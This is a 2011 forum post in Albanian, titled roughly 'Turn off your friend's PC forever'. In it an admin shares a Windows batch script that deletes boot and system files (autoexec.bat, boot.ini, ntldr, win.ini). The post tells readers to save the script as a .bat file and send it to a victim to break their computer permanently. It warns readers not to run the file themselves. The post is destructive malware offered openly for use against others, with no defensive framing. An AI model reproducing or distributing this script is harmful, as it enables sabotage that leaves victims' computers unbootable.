..: aG Public Server ::..
 
HomeCalendarFAQSearchMemberlistUsergroupsRegisterLog in

Share | 
 

 Fikja Pc-n Shokut Perkgjithmon

Go down 
AuthorMessage
fashix
Admin


Posts : 17
Join date : 2011-10-22

PostSubject: Fikja Pc-n Shokut Perkgjithmon   Mon Oct 24, 2011 6:49 pm

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini


Hapeni notepad dhe bëjeni copy past codin që është i postuar më lart dhe ruajeni si fajll .bat dhe ja dergoni fiktimes të cilen dëshironi më ja prish pc-n përgjithmon.

PERKUJTOJ:
Mos klikoni ju mbi atë fajll se ju shkon Pc-ja

Gjithashtu nëse fiktima ka VISTA atëhërë ky trik nuk funksionon.
Back to top Go down
View user profile
 
Fikja Pc-n Shokut Perkgjithmon
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
..::aG Public Server::.. :: Fikja Pc-n Shokut Pegjithmon-
Jump to: